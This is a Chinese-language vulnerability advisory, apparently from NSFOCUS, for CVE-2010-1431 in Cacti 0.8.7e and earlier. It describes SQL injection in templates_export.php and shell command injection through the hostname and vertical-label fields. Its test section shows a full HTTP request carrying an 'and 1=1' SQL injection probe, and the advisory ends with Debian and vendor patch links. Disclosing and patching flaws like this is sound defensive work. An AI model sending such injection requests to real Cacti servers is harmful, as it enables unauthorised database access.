安全研究
安全漏洞
Cacti SQL注入和命令注入漏洞
发布日期:2010-04-22
更新日期:2010-04-23
受影响系统:
Cacti Cacti <= 0.8.7e描述:
BUGTRAQ ID: 39639,39653
CVE ID: CVE-2010-1431
Cacti是一款轮循数据库(RRD)工具,可帮助从数据库信息创建图形,有多个Linux版本。
Cacti没有正确地过滤提交给templates_export.php页面的export_item_id参数便在SQL查询中使用,远程攻击者可以通过提交恶意请求执行SQL注入攻击;此外在添加或编辑设备时没有正确地过滤传送给主机名的输入,在添加或编辑图形目标时没有正确地过滤传送给垂直标签的输入,这可能导致注入并执行任意Shell命令。
<*来源:Nahuel Grisolia
链接:http://secunia.com/advisories/39570/
http://secunia.com/advisories/39568/
http://www.bonsai-sec.com/en/research/vulnerabilities/cacti-os-command-injection-0105.php
http://www.bonsai-sec.com/en/research/vulnerabilities/cacti-sql-injection-0104.php
http://www.debian.org/security/2010/dsa-2039
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Host: www.example.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://www.example.com/cacti-0.8.7e/templates_export.php
Cookie: clickedFolder=tree_1%5Etree_1_leaf_7%5E; highlightedTreeviewLink=tree_1_leaf_7;
Cacti=563bb99868dfa24cc70982bf80c5c03e
Content-Type: application/x-www-form-urlencoded
Content-Length: 130
export_item_id=18 and 1=1&include_deps=on&output_format=3&export_type=graph_template&
save_component_export=1&action=save&x=24&y=12
建议:
厂商补丁:
Debian
------
Debian已经为此发布了一个安全公告(DSA-2039-1)以及相应补丁:
DSA-2039-1:New cacti packages fix missing input sanitising
链接:http://www.debian.org/security/2010/dsa-2039
补丁下载:
Source archives:
http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+lenny2.diff.gz
Size/MD5 checksum: 37338 16b43e80a447a185f5372372836104ed
http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b.orig.tar.gz
Size/MD5 checksum: 1972444 aa8a740a6ab88e3634b546c3e1bc502f
http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+lenny2.dsc
Size/MD5 checksum: 1408 468d418ebedfd326081cbb159c159b55
Architecture independent packages:
http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+lenny2_all.deb
Size/MD5 checksum: 1826020 b88356b2559091ae8444b93b5234e881
补丁安装方法:
1. 手工安装补丁包:
首先,使用下面的命令来下载补丁软件:
# wget url (url是补丁下载链接地址)
然后,使用下面的命令来安装补丁:
# dpkg -i file.deb (file是相应的补丁名)
2. 使用apt-get自动安装补丁包:
首先,使用下面的命令更新内部数据库:
# apt-get update
然后,使用下面的命令安装更新软件包:
# apt-get upgrade
Cacti
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.cacti.net/downloads/patches/0.8.7e/sql_injection_template_export.patch
浏览次数:5357
严重程度:0(网友投票)
绿盟科技给您安全的保障
